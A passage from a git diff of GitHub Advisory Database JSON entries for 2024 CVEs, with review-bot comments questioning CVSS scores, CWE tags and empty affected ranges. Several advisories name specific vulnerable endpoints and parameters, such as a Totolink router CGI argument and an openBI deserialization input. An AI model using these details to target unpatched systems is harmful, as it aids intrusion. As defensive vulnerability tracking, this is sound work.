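Review bot: In the new GHSA-xpxv-cx25-38p3 file the details identify the target only by environment variables (`ROS_VERSION=2`, `ROS_PYTHON_VERSION=3`) and the distribution name Foxy Fitzroy, with no package, component or deserialization entry point named, and `affected` is empty, so nothing in the record can be matched to an artifact. The `"CRITICAL"` label rests entirely on a 9.8 vector (`PR:N/UI:N` over the network) whose preconditions the text does not substantiate. The only non-NVD reference is an individual's GitHub repository rather than a ROS 2 security advisory, a fix commit or a vendor statement. Until an affected package and a vendor source are identified, this entry should be read as an unconfirmed third-party report, and a reviewer should not infer a ROS distribution range from the text.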
@@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xq4v-69gf-r78f", + "modified": "2024-01-31T18:31:25Z", + "published": "2024-01-31T18:31:25Z", + "aliases": [ + "CVE-2024-0832" + ], + "details": "In Telerik Reporting versions prior to 2024 R1, a privilege elevation vulnerability has been identified in the applications installer component.  In an environment where an existing Telerik Reporting install is present, a lower privileged user has the ability to manipulate the installation package to elevate their privileges on the underlying operating system.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0832" + }, + { + "type": "WEB", + "url": "https://docs.telerik.com/reporting/knowledge-base/legacy-installer-vulnerability" + }, + { + "type": "WEB", + "url": "https://www.telerik.com/products/reporting.aspx" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-269" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T16:15:46Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-xqff-gxc3-2x4v/GHSA-xqff-gxc3-2x4v.json b/advisories/unreviewed/2024/01/GHSA-xqff-gxc3-2x4v/GHSA-xqff-gxc3-2x4v.json new file mode 100644 index 0000000000000..96c7ac10860e3 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-xqff-gxc3-2x4v/GHSA-xqff-gxc3-2x4v.json 
@@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xqff-gxc3-2x4v", + "modified": "2024-02-03T00:31:33Z", + "published": "2024-01-29T15:30:29Z", + "aliases": [ + "CVE-2023-6530" + ], + "details": "The TJ Shortcodes WordPress plugin through 0.1.3 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6530" + }, + { + "type": "WEB", + "url": "https://research.cleantalk.org/cve-2023-6530-tj-shortcodes-stored-xss-poc/" + }, + { + "type": "WEB", + "url": "https://wpscan.com/vulnerability/8e63bf7c-7827-4c4d-b0e3-66354b218bee/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T15:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-xr44-2pv4-gw8r/GHSA-xr44-2pv4-gw8r.json b/advisories/unreviewed/2024/01/GHSA-xr44-2pv4-gw8r/GHSA-xr44-2pv4-gw8r.json index 57da513e30237..142698165e614 100644 --- a/advisories/unreviewed/2024/01/GHSA-xr44-2pv4-gw8r/GHSA-xr44-2pv4-gw8r.json +++ b/advisories/unreviewed/2024/01/GHSA-xr44-2pv4-gw8r/GHSA-xr44-2pv4-gw8r.json 
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-xr44-2pv4-gw8r", - "modified": "2024-01-25T09:30:21Z", + "modified": "2024-01-31T21:31:03Z", "published": "2024-01-25T09:30:21Z", "aliases": [ "CVE-2023-33760" ], "details": "SpliceCom Maximiser Soft PBX v1.5 and before was discovered to utilize a default SSL certificate. This issue can allow attackers to eavesdrop on communications via a man-in-the-middle attack.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-295" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-25T08:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-xr6f-9r29-5gq3/GHSA-xr6f-9r29-5gq3.json b/advisories/unreviewed/2024/01/GHSA-xr6f-9r29-5gq3/GHSA-xr6f-9r29-5gq3.json index b0b48b72e312b..b8325baf96597 100644 --- a/advisories/unreviewed/2024/01/GHSA-xr6f-9r29-5gq3/GHSA-xr6f-9r29-5gq3.json +++ b/advisories/unreviewed/2024/01/GHSA-xr6f-9r29-5gq3/GHSA-xr6f-9r29-5gq3.json @@ -28,7 +28,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-77" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/01/GHSA-xvhp-2844-v475/GHSA-xvhp-2844-v475.json b/advisories/unreviewed/2024/01/GHSA-xvhp-2844-v475/GHSA-xvhp-2844-v475.json index a9cad0b338145..6059212ca99dd 100644 --- a/advisories/unreviewed/2024/01/GHSA-xvhp-2844-v475/GHSA-xvhp-2844-v475.json +++ b/advisories/unreviewed/2024/01/GHSA-xvhp-2844-v475/GHSA-xvhp-2844-v475.json 
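Review bot: In the GHSA-xr44-2pv4-gw8r hunk the added `"CWE-295"` classifies the SpliceCom issue as improper certificate validation, but the details describe the PBX shipping a default (shared) SSL certificate; nothing in the text says the client side validates incorrectly, and the weakness is the reused key material that lets anyone holding the default private key impersonate the server. The tag should be checked against the NVD record before it is relied on for filtering, especially since the same diff leaves the Cohesity entry, which actually describes missing certificate validation, with no CWE at all. The vector's `AC:H/UI:R` is the usual man-in-the-middle scoring and looks consistent with the description.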
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-xvhp-2844-v475", - "modified": "2024-01-26T09:30:23Z", + "modified": "2024-01-30T00:30:29Z", "published": "2024-01-26T09:30:23Z", "aliases": [ "CVE-2023-48133" ], "details": "An issue in angel coffee mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" + } ], "affected": [ @@ -27,7 +30,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-26T07:15:58Z" diff --git a/advisories/unreviewed/2024/01/GHSA-xvjx-j3q9-j35p/GHSA-xvjx-j3q9-j35p.json b/advisories/unreviewed/2024/01/GHSA-xvjx-j3q9-j35p/GHSA-xvjx-j3q9-j35p.json index b4787627da200..f508b01096984 100644 --- a/advisories/unreviewed/2024/01/GHSA-xvjx-j3q9-j35p/GHSA-xvjx-j3q9-j35p.json +++ b/advisories/unreviewed/2024/01/GHSA-xvjx-j3q9-j35p/GHSA-xvjx-j3q9-j35p.json @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20969" }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240201-0003/" + }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2024.html" diff --git a/advisories/unreviewed/2024/01/GHSA-xw3v-x6gq-q358/GHSA-xw3v-x6gq-q358.json b/advisories/unreviewed/2024/01/GHSA-xw3v-x6gq-q358/GHSA-xw3v-x6gq-q358.json index 7c1d8ef98079a..e6648ce959c8a 100644 --- a/advisories/unreviewed/2024/01/GHSA-xw3v-x6gq-q358/GHSA-xw3v-x6gq-q358.json +++ b/advisories/unreviewed/2024/01/GHSA-xw3v-x6gq-q358/GHSA-xw3v-x6gq-q358.json 
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-xw3v-x6gq-q358", - "modified": "2024-01-23T21:30:20Z", + "modified": "2024-01-29T18:31:48Z", "published": "2024-01-23T21:30:20Z", "aliases": [ "CVE-2023-41178" ], "details": "Reflected cross-site scripting (XSS) vulnerabilities in Trend Micro Mobile Security (Enterprise) could allow an exploit against an authenticated victim that visits a malicious link provided by an attacker.\n\nPlease note, this vulnerability is similar to, but not identical to, CVE-2023-41176.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T21:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-xw8g-vjxc-xg4v/GHSA-xw8g-vjxc-xg4v.json b/advisories/unreviewed/2024/01/GHSA-xw8g-vjxc-xg4v/GHSA-xw8g-vjxc-xg4v.json new file mode 100644 index 0000000000000..2e4acaabff615 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-xw8g-vjxc-xg4v/GHSA-xw8g-vjxc-xg4v.json 
@@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xw8g-vjxc-xg4v", + "modified": "2024-01-29T15:30:28Z", + "published": "2024-01-29T15:30:28Z", + "aliases": [ + "CVE-2024-0999" + ], + "details": "A vulnerability was found in Totolink N200RE 9.3.5u.6139_B20201216. It has been declared as critical. This vulnerability affects the function setParentalRules of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument eTime leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252268. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0999" + }, + { + "type": "WEB", + "url": "https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-setParentalRules-f891c062b86349a596ee173cb456b4f6?pvs=4" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252268" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252268" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T13:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-xwf3-49mf-8pq7/GHSA-xwf3-49mf-8pq7.json b/advisories/unreviewed/2024/01/GHSA-xwf3-49mf-8pq7/GHSA-xwf3-49mf-8pq7.json new file mode 100644 index 0000000000000..8f69a40805b00 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-xwf3-49mf-8pq7/GHSA-xwf3-49mf-8pq7.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xwf3-49mf-8pq7", + "modified": "2024-01-31T15:30:20Z", + "published": "2024-01-31T15:30:20Z", + "aliases": [ + "CVE-2024-22291" + ], + "details": "Cross-Site Request Forgery (CSRF) vulnerability in Marco Milesi Browser Theme Color.This issue affects Browser Theme Color: from n/a through 1.3.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22291" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/browser-theme-color/wordpress-browser-theme-color-plugin-1-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T13:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-xx65-34vr-mqrj/GHSA-xx65-34vr-mqrj.json b/advisories/unreviewed/2024/01/GHSA-xx65-34vr-mqrj/GHSA-xx65-34vr-mqrj.json index 51aad6dc782fe..1cd5d2a344ee8 100644 --- a/advisories/unreviewed/2024/01/GHSA-xx65-34vr-mqrj/GHSA-xx65-34vr-mqrj.json +++ b/advisories/unreviewed/2024/01/GHSA-xx65-34vr-mqrj/GHSA-xx65-34vr-mqrj.json 
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-xx65-34vr-mqrj", - "modified": "2024-01-26T09:30:23Z", + "modified": "2024-02-05T15:30:23Z", "published": "2024-01-26T09:30:23Z", "aliases": [ "CVE-2024-23388" ], "details": "Improper authorization in handler for custom URL scheme issue in \"Mercari\" App for Android prior to version 5.78.0 allows a remote attacker to lead a user to access an arbitrary website via the vulnerable App. As a result, the user may become a victim of a phishing attack.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-862" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-26T07:15:59Z" diff --git a/advisories/unreviewed/2024/01/GHSA-xx9p-c4jq-4cff/GHSA-xx9p-c4jq-4cff.json b/advisories/unreviewed/2024/01/GHSA-xx9p-c4jq-4cff/GHSA-xx9p-c4jq-4cff.json index faa79124da6d2..611b0c18e0013 100644 --- a/advisories/unreviewed/2024/01/GHSA-xx9p-c4jq-4cff/GHSA-xx9p-c4jq-4cff.json +++ b/advisories/unreviewed/2024/01/GHSA-xx9p-c4jq-4cff/GHSA-xx9p-c4jq-4cff.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-xx9p-c4jq-4cff", - "modified": "2024-01-23T21:30:21Z", + "modified": "2024-01-31T15:30:19Z", "published": "2024-01-23T21:30:21Z", "aliases": [ "CVE-2023-52337" ], "details": "An improper access control vulnerability in Trend Micro Deep Security 20.0 and Trend Micro Cloud One - Endpoint and Workload Security Agent could allow a local attacker to escalate privileges on affected installations.\n\nPlease note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ 
@@ -31,7 +34,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T21:15:09Z" diff --git a/advisories/unreviewed/2024/02/GHSA-23h8-ggh4-vmhv/GHSA-23h8-ggh4-vmhv.json b/advisories/unreviewed/2024/02/GHSA-23h8-ggh4-vmhv/GHSA-23h8-ggh4-vmhv.json new file mode 100644 index 0000000000000..c0540ac46aff7 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-23h8-ggh4-vmhv/GHSA-23h8-ggh4-vmhv.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-23h8-ggh4-vmhv", + "modified": "2024-02-06T21:30:26Z", + "published": "2024-02-06T21:30:26Z", + "aliases": [ + "CVE-2024-22240" + ], + "details": "Aria Operations for Networks contains a local file read vulnerability. A malicious actor with admin privileges may exploit this vulnerability leading to unauthorized access to sensitive information. ", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22240" + }, + { + "type": "WEB", + "url": "https://www.vmware.com/security/advisories/VMSA-2024-0002.html" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T20:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-23v9-73rv-qxqj/GHSA-23v9-73rv-qxqj.json b/advisories/unreviewed/2024/02/GHSA-23v9-73rv-qxqj/GHSA-23v9-73rv-qxqj.json new file mode 100644 index 0000000000000..0553a2d053f75 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-23v9-73rv-qxqj/GHSA-23v9-73rv-qxqj.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-23v9-73rv-qxqj", + "modified": "2024-02-02T18:30:32Z", + "published": "2024-02-02T18:30:32Z", + "aliases": [ + "CVE-2023-45037" + ], + "details": "A buffer copy without checking size of input vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to execute code via a network.\n\nWe have already fixed the vulnerability in the following versions:\nQTS 5.1.3.2578 build 20231110 and later\nQuTS hero h5.1.3.2578 build 20231110 and later\nQuTScloud c5.1.5.2651 and later\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45037" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-23-46" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T16:15:51Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-24rh-qhmv-p8j2/GHSA-24rh-qhmv-p8j2.json b/advisories/unreviewed/2024/02/GHSA-24rh-qhmv-p8j2/GHSA-24rh-qhmv-p8j2.json new file mode 100644 index 0000000000000..336838ea10543 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-24rh-qhmv-p8j2/GHSA-24rh-qhmv-p8j2.json 
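Review bot: In the new GHSA-23v9-73rv-qxqj file the details state the bug lets authenticated administrators execute code over the network, yet the vector `C:N/I:L/A:L` (and the derived `"severity": "LOW"`) records no confidentiality impact and only partial integrity and availability, which is not what code execution normally means. The score is presumably the CNA's and mirrored from NVD (the file is `"github_reviewed": false`), but a LOW label on a remote code execution primitive is the kind of mismatch that should be flagged before it is consumed downstream. The fixed builds (`QTS 5.1.3.2578`, `QuTS hero h5.1.3.2578`, `QuTScloud c5.1.5.2651`) exist only in the free-text details; `affected` stays empty, so no version comparison is possible from this record.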
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-24rh-qhmv-p8j2", + "modified": "2024-02-02T15:30:28Z", + "published": "2024-02-02T15:30:28Z", + "aliases": [ + "CVE-2024-0253" + ], + "details": "ManageEngine ADAudit Plus versions 7270 and below are vulnerable to the Authenticated SQL injection in home Graph-Data.\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0253" + }, + { + "type": "WEB", + "url": "https://www.manageengine.com/products/active-directory-audit/sqlfix-7271.html" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T13:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-259r-2fr5-87c3/GHSA-259r-2fr5-87c3.json b/advisories/unreviewed/2024/02/GHSA-259r-2fr5-87c3/GHSA-259r-2fr5-87c3.json new file mode 100644 index 0000000000000..3e17104866794 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-259r-2fr5-87c3/GHSA-259r-2fr5-87c3.json 
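Review bot: In the new GHSA-24rh-qhmv-p8j2 file `cwe_ids` is empty even though the details explicitly call the issue an authenticated SQL injection; the IQCRM SQL-injection entry earlier in this diff (GHSA-x22g-h3w3-4m5v) is tagged `"CWE-89"`, so `"cwe_ids": ["CWE-89"]` would keep the two consistent if the NVD record carries that CWE. The vector `PR:L` with `C:H/I:H/A:L` is plausible for authenticated SQLi and the `"HIGH"` label follows from it. The vendor reference `sqlfix-7271.html` is the only source that pins the fixed build implied by "7270 and below"; `affected` is empty, so that bound lives only in prose and cannot be matched by version.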
@@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-259r-2fr5-87c3", + "modified": "2024-02-08T21:30:38Z", + "published": "2024-02-08T21:30:38Z", + "aliases": [ + "CVE-2024-24496" + ], + "details": "An issue in Daily Habit Tracker v.1.0 allows a remote attacker to manipulate trackers via the home.php, add-tracker.php, delete-tracker.php, update-tracker.php components.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24496" + }, + { + "type": "WEB", + "url": "https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/DailyHabitTracker-Broken_Access_Control.md" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T21:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-25c3-4v7x-3hrp/GHSA-25c3-4v7x-3hrp.json b/advisories/unreviewed/2024/02/GHSA-25c3-4v7x-3hrp/GHSA-25c3-4v7x-3hrp.json new file mode 100644 index 0000000000000..aa68f50f573a7 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-25c3-4v7x-3hrp/GHSA-25c3-4v7x-3hrp.json 
@@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-25c3-4v7x-3hrp", + "modified": "2024-02-03T00:31:34Z", + "published": "2024-02-03T00:31:34Z", + "aliases": [ + "CVE-2024-1198" + ], + "details": "A vulnerability, which was classified as critical, was found in openBI up to 6.0.3. Affected is the function addxinzhi of the file application/controllers/User.php of the component Phar Handler. The manipulation of the argument outimgurl leads to deserialization. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252696.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1198" + }, + { + "type": "WEB", + "url": "https://note.zhaoj.in/share/qFXZZfp1NLa3" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252696" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252696" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-03T00:15:44Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-25rq-9fcx-x8f3/GHSA-25rq-9fcx-x8f3.json b/advisories/unreviewed/2024/02/GHSA-25rq-9fcx-x8f3/GHSA-25rq-9fcx-x8f3.json new file mode 100644 index 0000000000000..d2337b401315e --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-25rq-9fcx-x8f3/GHSA-25rq-9fcx-x8f3.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-25rq-9fcx-x8f3", + "modified": "2024-02-08T15:30:27Z", + "published": "2024-02-08T15:30:27Z", + "aliases": [ + "CVE-2024-24877" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Magic Hills Pty Ltd Wonder Slider Lite allows Reflected XSS.This issue affects Wonder Slider Lite: from n/a through 13.9.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24877" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/wonderplugin-slider-lite/wordpress-wonder-slider-lite-plugin-13-9-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T13:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-27rv-vgm8-cv35/GHSA-27rv-vgm8-cv35.json b/advisories/unreviewed/2024/02/GHSA-27rv-vgm8-cv35/GHSA-27rv-vgm8-cv35.json new file mode 100644 index 0000000000000..db6800bf15fec --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-27rv-vgm8-cv35/GHSA-27rv-vgm8-cv35.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-27rv-vgm8-cv35", + "modified": "2024-02-02T18:30:32Z", + "published": "2024-02-02T18:30:32Z", + "aliases": [ + "CVE-2023-47561" + ], + "details": "A cross-site scripting (XSS) vulnerability has been reported to affect Photo Station. If exploited, the vulnerability could allow authenticated users to inject malicious code via a network.\n\nWe have already fixed the vulnerability in the following version:\nPhoto Station 6.4.2 ( 2023/12/15 ) and later\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47561" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-24-08" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T16:15:51Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-27xq-w3jc-436c/GHSA-27xq-w3jc-436c.json b/advisories/unreviewed/2024/02/GHSA-27xq-w3jc-436c/GHSA-27xq-w3jc-436c.json new file mode 100644 index 0000000000000..5aaa1f6022c98 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-27xq-w3jc-436c/GHSA-27xq-w3jc-436c.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-27xq-w3jc-436c", + "modified": "2024-02-07T15:30:47Z", + "published": "2024-02-05T15:30:23Z", + "aliases": [ + "CVE-2024-23109" + ], + "details": "An improper neutralization of special elements used in an os command ('os command injection') in Fortinet FortiSIEM version 7.1.0 through 7.1.1 and 7.0.0 through 7.0.2 and 6.7.0 through 6.7.8 and 6.6.0 through 6.6.3 and 6.5.0 through 6.5.2 and 6.4.0 through 6.4.2 allows attacker to execute unauthorized code or commands via via crafted API requests.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23109" + }, + { + "type": "WEB", + "url": "https://fortiguard.com/psirt/FG-IR-23-130" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T14:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-283h-3w9j-26xq/GHSA-283h-3w9j-26xq.json b/advisories/unreviewed/2024/02/GHSA-283h-3w9j-26xq/GHSA-283h-3w9j-26xq.json new file mode 100644 index 0000000000000..1c78902e11d48 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-283h-3w9j-26xq/GHSA-283h-3w9j-26xq.json 
@@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-283h-3w9j-26xq", + "modified": "2024-02-02T15:30:28Z", + "published": "2024-02-02T15:30:28Z", + "aliases": [ + "CVE-2023-38273" + ], + "details": "IBM Cloud Pak System 2.3.1.1, 2.3.2.0, and 2.3.3.7 uses an inadequate account lockout setting that could allow a remote attacker to brute force account credentials. IBM X-Force ID: 260733.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-38273" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/260733" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7105357" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-307" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T15:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-283m-jhf4-68hp/GHSA-283m-jhf4-68hp.json b/advisories/unreviewed/2024/02/GHSA-283m-jhf4-68hp/GHSA-283m-jhf4-68hp.json new file mode 